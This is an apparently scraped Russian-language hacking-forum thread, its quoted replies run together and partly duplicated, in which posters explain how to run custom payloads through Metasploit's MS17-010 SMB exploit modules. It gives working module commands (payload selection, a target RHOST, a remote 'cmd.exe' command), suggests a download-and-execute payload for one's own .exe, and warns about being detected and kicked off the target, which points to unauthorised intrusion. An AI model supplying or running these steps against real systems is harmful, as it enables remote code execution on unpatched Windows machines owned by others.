Привет читающему! Как при атаке MS10-010 задать свой пейлоад, например батник?
set payload windows/x64/execДа, с меты. Спасибо!Эксп из метасплойта? тогда так
set payload windows/x64/exec
Тогда никак. Как автор его задумал так он и будет работать. Там править шелл-код надо будет, чтобы он делал то, что ты хочешь. Это работа уже для специалиста, который разбирается в бинарной эксплуатации на уровне ядра под windows.А если эксп не из меты, а свой? Например bat или exe?
в set payload выбери нагрузку Download&Execute и укажи ссылку на свой .exe файлА если эксп не из меты, а свой? Например bat или exe?
use auxiliary/admin/smb/ms17_010_command
set RHOST 192.168.200.200
set command "cmd.exe /c whoami"
Если доменного юзера нет то возьникнут сложности с поиском пайпа на ос вин7/2008используете сначала этот модуль
Код:use auxiliary/admin/smb/ms17_010_command set RHOST 192.168.200.200 set command "cmd.exe /c whoami"
т.к. можете спалится, и выкинуть вас довольно быстро
согласен, но если так работает, то лучше попробовать сначала, чем грузить файл в неизвестностьЕсли доменного юзера нет то возьникнут сложности с поиском пайпа на ос вин7/2008